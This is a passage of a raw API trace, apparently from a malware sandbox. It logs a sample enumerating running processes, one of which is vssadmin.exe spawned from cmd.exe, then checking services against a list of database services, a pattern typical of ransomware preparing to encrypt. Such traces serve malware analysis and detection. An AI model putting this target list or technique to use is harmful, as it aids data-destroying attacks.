th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x58, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.996] lstrlenW (lpString="svchost.exe") returned 11 [0223.996] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.996] lstrlenW (lpString="svchost.exe") returned 11 [0223.996] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.997] lstrlenW (lpString="svchost.exe") returned 11 [0223.997] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.998] lstrlenW (lpString="svchost.exe") returned 11 [0223.998] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.999] lstrlenW (lpString="svchost.exe") returned 11 [0223.999] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.999] lstrlenW (lpString="svchost.exe") returned 11 [0223.999] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.000] lstrlenW (lpString="svchost.exe") returned 11 [0224.000] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.001] lstrlenW (lpString="svchost.exe") returned 11 [0224.001] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.002] lstrlenW (lpString="svchost.exe") returned 11 [0224.002] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.003] lstrlenW (lpString="spoolsv.exe") returned 11 [0224.003] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.003] lstrlenW (lpString="svchost.exe") returned 11 [0224.004] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.004] lstrlenW (lpString="svchost.exe") returned 11 [0224.004] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.005] lstrlenW (lpString="audiodg.exe") returned 11 [0224.005] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0224.006] lstrlenW (lpString="sihost.exe") returned 10 [0224.006] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.006] lstrlenW (lpString="svchost.exe") returned 11 [0224.007] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0224.007] lstrlenW (lpString="taskhostw.exe") returned 13 [0224.007] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.008] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0224.008] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0224.009] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0224.009] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.009] lstrlenW (lpString="explorer.exe") returned 12 [0224.009] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0224.010] lstrlenW (lpString="Memory Compression") returned 18 [0224.010] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0224.011] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0224.011] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0224.012] lstrlenW (lpString="SearchUI.exe") returned 12 [0224.012] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0224.012] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0224.012] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.013] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0224.013] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0224.014] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0224.014] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0224.015] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0224.015] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.015] lstrlenW (lpString="conhost.exe") returned 11 [0224.015] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0224.016] lstrlenW (lpString="roof competitive.exe") returned 20 [0224.016] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0224.017] lstrlenW (lpString="trustees.exe") returned 12 [0224.017] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0224.018] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0224.018] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0224.019] lstrlenW (lpString="isbn.exe") returned 8 [0224.019] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0224.020] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0224.020] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0224.020] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0224.020] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0224.021] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0224.021] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0224.022] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0224.022] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0224.022] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0224.023] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0224.023] lstrlenW (lpString="playstation iraq.exe") returned 20 [0224.023] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0224.024] lstrlenW (lpString="harbor.exe") returned 10 [0224.024] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0224.025] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0224.025] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0224.025] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0224.026] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0224.026] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0224.026] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0224.027] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0224.027] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0224.028] lstrlenW (lpString="larent.exe") returned 10 [0224.028] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0224.028] lstrlenW (lpString="stereo.exe") returned 10 [0224.028] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0224.029] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0224.029] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0224.030] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0224.030] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0224.031] lstrlenW (lpString="state.exe") returned 9 [0224.031] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0224.032] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0224.032] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.033] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0224.033] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0224.034] lstrlenW (lpString="taskhostw.exe") returned 13 [0224.034] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0224.034] lstrlenW (lpString="sppsvc.exe") returned 10 [0224.034] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.035] lstrlenW (lpString="svchost.exe") returned 11 [0224.035] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0224.036] lstrlenW (lpString="Pg.exe") returned 6 [0224.036] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0224.037] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0224.037] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.038] lstrlenW (lpString="conhost.exe") returned 11 [0224.038] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0224.038] lstrlenW (lpString="cmd.exe") returned 7 [0224.038] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.039] lstrlenW (lpString="conhost.exe") returned 11 [0224.039] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0224.040] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0224.040] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.041] lstrlenW (lpString="conhost.exe") returned 11 [0224.041] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0224.042] lstrlenW (lpString="vssadmin.exe") returned 12 [0224.042] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0224.042] CloseHandle (hObject=0x45c) returned 1 [0224.042] Sleep (dwMilliseconds=0x1f4) [0224.549] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bc10 [0224.549] EnumServicesStatusExW (in: hSCManager=0x236bc10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0224.549] GetLastError () returned 0xea [0224.549] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x201e) returned 0x2372d70 [0224.549] EnumServicesStatusExW (in: hSCManager=0x236bc10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x201e, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0224.550] CloseServiceHandle (hSCObject=0x236bc10) returned 1 [0224.550] lstrlenW (lpString="Appinfo") returned 7 [0224.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0224.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0224.550] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0224.550] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0224.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0224.550] lstrlenW (lpString="AppXSvc") returned 7 [0224.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0224.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0224.550] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0224.550] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0224.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0224.551] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0224.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0224.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0224.551] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0224.551] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0224.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0224.551] lstrlenW (lpString="Audiosrv") returned 8 [0224.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0224.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0224.551] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0224.551] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0224.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0224.551] lstrlenW (lpString="BFE") returned 3 [0224.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0224.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0224.551] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0224.551] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0224.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0224.551] lstrlenW (lpString="BITS") returned 4 [0224.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0224.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0224.551] lstrcmpiW 